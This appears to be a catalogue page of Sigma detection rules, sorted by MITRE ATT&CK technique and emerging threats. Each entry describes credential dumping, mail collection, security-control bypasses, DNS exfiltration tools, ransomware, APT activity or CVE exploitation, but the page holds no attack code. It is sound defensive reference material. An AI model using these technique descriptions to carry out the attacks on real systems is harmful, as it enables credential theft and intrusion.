  • Access To Windows Outlook Mail Files By Uncommon Applications - Level: low
    Description: Detects file access requests to Windows Outlook Mail by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
  • Windows Mail App Mailbox Access Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.
attack.t1027.010 2
Show Rules (2)
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
attack.t1055.002 1
Show Rules (1)
  • Suspicious In-Memory Module Execution - Level: low
    Description: Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
attack.t1218.004 1
Show Rules (1)
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
attack.t1069.003 1
Show Rules (1)
  • RBAC Permission Enumeration Attempt - Level: low
    Description: Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.
attack.t1021.007 1
Show Rules (1)
  • AWS Console GetSigninToken Potential Abuse - Level: medium
    Description: Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.
attack.t1578.003 1
Show Rules (1)
  • Azure Active Directory Hybrid Health AD FS Service Delete - Level: medium
    Description: This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.
attack.t1562.007 1
Show Rules (1)
  • Azure Network Firewall Policy Modified or Deleted - Level: medium
    Description: Identifies when a Firewall Policy is Modified or Deleted.
attack.t1098.005 1
Show Rules (1)
  • Windows LAPS Credential Dump From Entra ID - Level: high
    Description: Detects when an account dumps the LAPS password from Entra ID.
attack.t1586.003 1
Show Rules (1)
  • Okta Suspicious Activity Reported by End-user - Level: high
    Description: Detects when an Okta end-user reports activity by their account as being potentially suspicious.
attack.t1547.006 1
Show Rules (1)
  • Loading of Kernel Module via Insmod - Level: high
    Description: Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
attack.t1588.001 1
Show Rules (1)
  • Relevant ClamAV Message - Level: high
    Description: Detects relevant ClamAV messages
attack.t1055.009 1
Show Rules (1)
  • Potential Linux Process Code Injection Via DD Utility - Level: medium
    Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
attack.t1562.003 1
Show Rules (1)
  • ESXi Syslog Configuration Change Via ESXCLI - Level: medium
    Description: Detects changes to the ESXi syslog configuration via "esxcli"
attack.t1546.014 1
Show Rules (1)
  • MacOS Emond Launch Daemon - Level: medium
    Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
attack.t1037.005 1
Show Rules (1)
  • Startup Item File Created - MacOS - Level: low
    Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
attack.t1555.001 1
Show Rules (1)
  • Credentials from Password Stores - Keychain - Level: medium
    Description: Detects passwords dumps from Keychain
attack.t1569.001 1
Show Rules (1)
  • Launch Agent/Daemon Execution Via Launchctl - Level: medium
    Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
attack.t1036.006 1
Show Rules (1)
  • Space After Filename - macOS - Level: low
    Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
attack.t1553.001 1
Show Rules (1)
  • Gatekeeper Bypass via Xattr - Level: low
    Description: Detects macOS Gatekeeper bypass via xattr utility
attack.t1561.001 1
Show Rules (1)
  • Cisco File Deletion - Level: medium
    Description: See what files are being deleted from flash file systems
attack.t1561.002 1
Show Rules (1)
  • Cisco File Deletion - Level: medium
    Description: See what files are being deleted from flash file systems
attack.t1565.002 1
Show Rules (1)
  • Cisco Modify Configuration - Level: medium
    Description: Modifications to a config that will serve an adversary's impacts or persistence
attack.t1595.002 1
Show Rules (1)
  • DNS Query to External Service Interaction Domains - Level: high
    Description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
attack.t1590.002 1
Show Rules (1)
  • Failed DNS Zone Transfer - Level: medium
    Description: Detects when a DNS zone transfer failed.
attack.t1553.002 1
Show Rules (1)
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
attack.t1134.005 1
Show Rules (1)
  • Addition of SID History to Active Directory Object - Level: medium
    Description: An attacker can use the SID history attribute to gain additional privileges.
attack.t1499.001 1
Show Rules (1)
  • NTFS Vulnerability Exploitation - Level: high
    Description: This the exploitation of a NTFS vulnerability as reported without many details via Twitter
attack.t1555.005 1
Show Rules (1)
  • Remote Thread Created In KeePass.EXE - Level: high
    Description: Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity
attack.t1599.001 1
Show Rules (1)
  • WinDivert Driver Load - Level: high
    Description: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
attack.t1137.003 1
Show Rules (1)
  • Potential Persistence Via Outlook Form - Level: high
    Description: Detects the creation of a new Outlook form which can contain malicious code
attack.t1547.015 1
Show Rules (1)
  • Windows Terminal Profile Settings Modification By Uncommon Process - Level: medium
    Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
attack.t1027.002 1
Show Rules (1)
  • Python Image Load By Non-Python Process - Level: medium
    Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.
attack.t1114.001 1
Show Rules (1)
  • Powershell Local Email Collection - Level: medium
    Description: Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.
attack.t1055.011 1
Show Rules (1)
  • Uncommon Process Access Rights For Target Image - Level: low
    Description: Detects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.
attack.t1542.003 1
Show Rules (1)
  • Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE - Level: medium
    Description: Detects potential malicious and unauthorized usage of bcdedit.exe
attack.t1614.001 1
Show Rules (1)
  • Console CodePage Lookup Via CHCP - Level: medium
    Description: Detects use of chcp to look up the system locale value as part of host discovery
attack.t1218.002 1
Show Rules (1)
  • Control Panel Items - Level: high
    Description: Detects the malicious use of a control panel item
attack.t1048.001 1
Show Rules (1)
  • DNS Exfiltration and Tunneling Tools Execution - Level: high
    Description: Well-known DNS Exfiltration tools execution
attack.t1110.002 1
Show Rules (1)
  • HackTool - Hashcat Password Cracker Execution - Level: high
    Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
attack.t1134.004 1
Show Rules (1)
  • HackTool - PPID Spoofing SelectMyParent Tool Execution - Level: high
    Description: Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent
attack.t1574.008 1
Show Rules (1)
  • Using SettingSyncHost.exe as LOLBin - Level: high
    Description: Detects using SettingSyncHost.exe to run hijacked binary
attack.t1590.001 1
Show Rules (1)
  • PUA - Crassus Execution - Level: high
    Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
attack.t1562.010 1
Show Rules (1)
  • LSA PPL Protection Disabled Via Reg.EXE - Level: high
    Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
attack.t1505.005 1
Show Rules (1)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
attack.t1574.007 1
Show Rules (1)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
attack.t1547.014 1
Show Rules (1)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
attack.t1547.002 1
Show Rules (1)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
attack.t1021.005 1
Show Rules (1)
  • Suspicious UltraVNC Execution - Level: high
    Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
attack.t1546.010 1
Show Rules (1)
  • New DLL Added to AppInit_DLLs Registry Key - Level: medium
    Description: DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll
attack.t1547.005 1
Show Rules (1)
  • Security Support Provider (SSP) Added to LSA Configuration - Level: high
    Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
attack.t1547.008 1
Show Rules (1)
  • DLL Load via LSASS - Level: high
    Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
attack.t1559.002 1
Show Rules (1)
  • Enable Microsoft Dynamic Data Exchange - Level: medium
    Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
attack.t1547.003 1
Show Rules (1)
  • New TimeProviders Registered With Uncommon DLL Name - Level: high
    Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
attack.t1036.008 1
Show Rules (1)
  • Non-DLL Extension File Renamed With DLL Extension - Level: medium
    Description: Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.
attack.t1090.004 1
Show Rules (1)
  • Potentially Suspicious Azure Front Door Connection - Level: medium
    Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
attack.t1583.006 1
Show Rules (1)
  • Potential AWS Cloud Email Service Abuse - Level: medium
    Description: Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession
attack.t1574.010 1
Show Rules (1)
  • Files Dropped to Program Files by Non-Priviledged Process - Level: medium
    Description: Search for dropping of files to Windows/Program Files fodlers by non-priviledged processes

Top MITRE Other Techniques

Other TechniqueCountRule TitleCount Bar
detection.emerging_threats 333
Show Rules (333)
  • Rejetto HTTP File Server RCE - Level: high
    Description: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
  • CVE-2010-5278 Exploitation Attempt - Level: critical
    Description: MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the called and well-known function name
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • Exploit for CVE-2015-1641 - Level: critical
    Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
  • Adwind RAT / JRAT - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • CosmicDuke Service Installation - Level: critical
    Description: Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
  • Fireball Archer Install - Level: high
    Description: Detects Archer malware invocation via rundll32
  • Malware Shellcode in Verclsid Target Process - Level: high
    Description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
  • Potential PlugX Activity - Level: high
    Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
  • StoneDrill Service Install - Level: high
    Description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • Potential APT10 Cloud Hopper Activity - Level: high
    Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
  • Ps.exe Renamed SysInternals Tool - Level: high
    Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
  • Equation Group C2 Communication - Level: high
    Description: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
  • Lazarus System Binary Masquerading - Level: high
    Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
  • Turla Group Named Pipes - Level: critical
    Description: Detects a named pipe used by Turla group samples
  • Turla Service Install - Level: high
    Description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
  • Turla PNG Dropper Service - Level: critical
    Description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
  • Fortinet CVE-2018-13379 Exploitation - Level: critical
    Description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
  • Oracle WebLogic Exploit - Level: critical
    Description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
  • APT27 - Emissary Panda Activity - Level: critical
    Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
  • APT29 2018 Phishing Campaign File Indicators - Level: critical
    Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
  • APT29 2018 Phishing Campaign CommandLine Indicators - Level: critical
    Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
  • OceanLotus Registry Activity - Level: critical
    Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
  • Potential MuddyWater APT Activity - Level: high
    Description: Detects potential Muddywater APT activity
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Defrag Deactivation - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • Defrag Deactivation - Security - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • TropicTrooper Campaign November 2018 - Level: high
    Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
  • Potential BearLPE Exploitation - Level: high
    Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
  • Pulse Secure Attack CVE-2019-11510 - Level: critical
    Description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
  • Citrix Netscaler Attack CVE-2019-19781 - Level: critical
    Description: Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack
  • Exploiting CVE-2019-1388 - Level: critical
    Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
  • Confluence Exploitation CVE-2019-3398 - Level: critical
    Description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398
  • Potential Dridex Activity - Level: critical
    Description: Detects potential Dridex acitvity via specific process patterns
  • Potential Dtrack RAT Activity - Level: critical
    Description: Detects potential Dtrack RAT activity via specific process patterns
  • Potential Emotet Activity - Level: high
    Description: Detects all Emotet like process executions that are not covered by the more generic rules
  • Formbook Process Creation - Level: high
    Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
  • LockerGoga Ransomware Activity - Level: critical
    Description: Detects LockerGoga ransomware activity via specific command line.
  • Potential QBot Activity - Level: critical
    Description: Detects potential QBot activity by looking for process executions used previously by QBot
  • Potential Ryuk Ransomware Activity - Level: high
    Description: Detects Ryuk ransomware activity
  • Potential Snatch Ransomware Activity - Level: high
    Description: Detects specific process characteristics of Snatch ransomware word document droppers
  • Potential Ursnif Malware Activity - Registry - Level: high
    Description: Detects registry keys related to Ursnif malware.
  • Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 - Level: medium
    Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
  • APT31 Judgement Panda Activity - Level: critical
    Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
  • Potential Russian APT Credential Theft Activity - Level: critical
    Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
  • Potential EmpireMonkey Activity - Level: high
    Description: Detects potential EmpireMonkey APT activity
  • Equation Group DLL_U Export Function Load - Level: critical
    Description: Detects a specific export function name used by one of EquationGroup tools
  • Mustang Panda Dropper - Level: high
    Description: Detects specific process parameters as used by Mustang Panda droppers
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • CVE-2020-0688 Exploitation Attempt - Level: high
    Description: Detects CVE-2020-0688 Exploitation attempts
  • CVE-2020-0688 Exchange Exploitation via Web Log - Level: critical
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-0688 Exploitation via Eventlog - Level: high
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass - Level: critical
    Description: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
  • DNS RCE CVE-2020-1350 - Level: critical
    Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
  • Potential Emotet Rundll32 Execution - Level: critical
    Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt - Level: critical
    Description: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 - Level: critical
    Description: Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC - Level: high
    Description: Detects the execution of the commonly used ZeroLogon PoC executable.
  • Suspicious PrinterPorts Creation (CVE-2020-1048) - Level: high
    Description: Detects new commands that add new printer port which point to suspicious file
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
  • TerraMaster TOS CVE-2020-28188 - Level: high
    Description: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188
  • Blue Mockingbird - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • GALLIUM IOCs - Level: high
    Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
  • Potential Maze Ransomware Activity - Level: critical
    Description: Detects specific process characteristics of Maze ransomware word document droppers
  • Trickbot Malware Activity - Level: high
    Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
  • Potential Ke3chang/TidePool Malware Activity - Level: high
    Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
  • EvilNum APT Golden Chickens Deployment Via OCX Files - Level: critical
    Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
  • Cisco ASA FTD Exploit CVE-2020-3452 - Level: high
    Description: Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)
  • Oracle WebLogic Exploit CVE-2020-14882 - Level: high
    Description: Detects exploitation attempts on WebLogic servers
  • Lazarus Group Activity - Level: critical
    Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
  • GALLIUM Artefacts - Builtin - Level: high
    Description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  • Leviathan Registry Key Activity - Level: critical
    Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
  • Solarwinds SUPERNOVA Webshell Access - Level: critical
    Description: Detects access to SUPERNOVA webshell as described in Guidepoint report
  • UNC2452 Process Creation Patterns - Level: high
    Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
  • UNC2452 PowerShell Pattern - Level: critical
    Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
  • Suspicious VBScript UN2452 Pattern - Level: high
    Description: Detects suspicious inline VBScript keywords as used by UNC2452
  • TAIDOOR RAT DLL Load - Level: high
    Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
  • Winnti Malware HK University Campaign - Level: critical
    Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
  • Winnti Pipemon Characteristics - Level: critical
    Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • Arcadyan Router Exploitations - Level: critical
    Description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
  • Possible Exploitation of Exchange RCE CVE-2021-42321 - Level: high
    Description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern - Level: critical
    Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
  • Possible CVE-2021-1675 Print Spooler Exploitation - Level: high
    Description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation - Level: critical
    Description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation IPC Access - Level: critical
    Description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
  • Oracle WebLogic Exploit CVE-2021-2109 - Level: critical
    Description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
  • CVE-2021-21972 VSphere Exploitation - Level: high
    Description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972
  • CVE-2021-21978 Exploitation Attempt - Level: high
    Description: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978
  • VMware vCenter Server File Upload CVE-2021-22005 - Level: high
    Description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.
  • Fortinet CVE-2021-22123 Exploitation - Level: critical
    Description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
  • Pulse Connect Secure RCE Attack CVE-2021-22893 - Level: high
    Description: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
  • Potential CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection
  • Exploitation of CVE-2021-26814 in Wazuh - Level: high
    Description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
  • Potential CVE-2021-26857 Exploitation Attempt - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
  • CVE-2021-26858 Exchange Exploitation - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content
  • ProxyLogon Reset Virtual Directories Based On IIS Log - Level: critical
    Description: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
  • Potential CVE-2021-27905 Exploitation Attempt - Level: medium
    Description: Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.
  • Exchange Exploitation CVE-2021-28480 - Level: critical
    Description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
  • CVE-2021-33766 Exchange ProxyToken Exploitation - Level: critical
    Description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322 - Level: critical
    Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
  • Suspicious Word Cab File Write CVE-2021-40444 - Level: high
    Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
  • Potential CVE-2021-40444 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
  • Potential Exploitation Attempt From Office Application - Level: high
    Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
  • ADSelfService Exploitation - Level: high
    Description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit - Level: critical
    Description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event - Level: critical
    Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
  • Potential CVE-2021-41379 Exploitation Attempt - Level: critical
    Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
  • LPE InstallerFileTakeOver PoC CVE-2021-41379 - Level: high
    Description: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379
  • CVE-2021-41773 Exploitation Attempt - Level: high
    Description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
  • Sitecore Pre-Auth RCE CVE-2021-42237 - Level: high
    Description: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx
